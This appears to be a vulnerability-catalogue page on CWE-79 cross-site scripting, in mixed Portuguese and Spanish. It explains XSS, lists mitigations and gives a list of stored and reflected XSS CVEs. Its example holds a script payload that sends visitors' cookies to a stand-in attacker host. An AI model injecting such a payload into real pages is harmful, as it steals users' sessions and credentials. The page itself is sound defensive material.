Fallos del tipo CWE-79

29.081 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2023-1148MEDIUMCross-site Scripting (XSS) - Stored in flatpressblog/flatpressEPSS 0.5%CVE-2024-1499MEDIUMOrbit Fox by ThemeIsle <= 2.10.30 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2024-0700MEDIUMSimple Tweet <= 1.4.0.2 - Authenticated (Author+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2023-1760HIGHCross-site Scripting (XSS) - Stored in thorsten/phpmyfaqEPSS 0.5%CVE-2022-37330MEDIUMWordPress WHA Crossword plugin <= 1.1.10 - Authenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2024-46367CRITICALA Stored Cross-Site Scripting (XSS) vulnerability in Webkul Krayin CRM 1.3.0 allows remote attackers to inject arbitrary JavaScript code by EPSS 0.5%CVE-2023-3387MEDIUMLana Text to Image <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via ShortcodeEPSS 0.5%CVE-2023-7171LOWNovel-Plus Friendly Link FriendLinkController.java cross site scriptingEPSS 0.5%CVE-2021-23283MEDIUMSecurity issues in Eaton Intelligent Power Protector (IPP)EPSS 0.5%CVE-2026-21884HIGHReact Router SSR XSS in ScrollRestorationEPSS 0.5%CVE-2024-11971MEDIUMGuizhou Xiaoma Technology jpress Avatar upload cross site scriptingEPSS 0.5%CVE-2024-1070MEDIUMSiteOrigin Widgets Bundle <= 1.58.2 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2024-0961MEDIUMSiteOrigin Widgets Bundle <= 1.58.1 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2024-1498MEDIUMHappy Addons for Elementor <= 3.10.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Photo Stack WidgetEPSS 0.5%CVE-2024-3199MEDIUMThe Plus Addons for Elementor <= 5.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown WidgetEPSS 0.5%CVE-2024-52850MEDIUMAdobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.5%CVE-2024-13919HIGHLaravel Reflected XSS via Route Parameter in Debug-Mode Error PageEPSS 0.5%CVE-2023-1403MEDIUMWeaver Xtreme Theme <= 5.0.7 - Authenticated(Contributor+) Stored Cross-Site Scripting via Display NameEPSS 0.5%CVE-2024-3517MEDIUMShortcodes and extra features for Phlox theme <= 2.15.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via Accordion WidgetEPSS 0.5%CVE-2024-11304MEDIUMMultiple Stored Cross-Site ScriptingEPSS 0.5%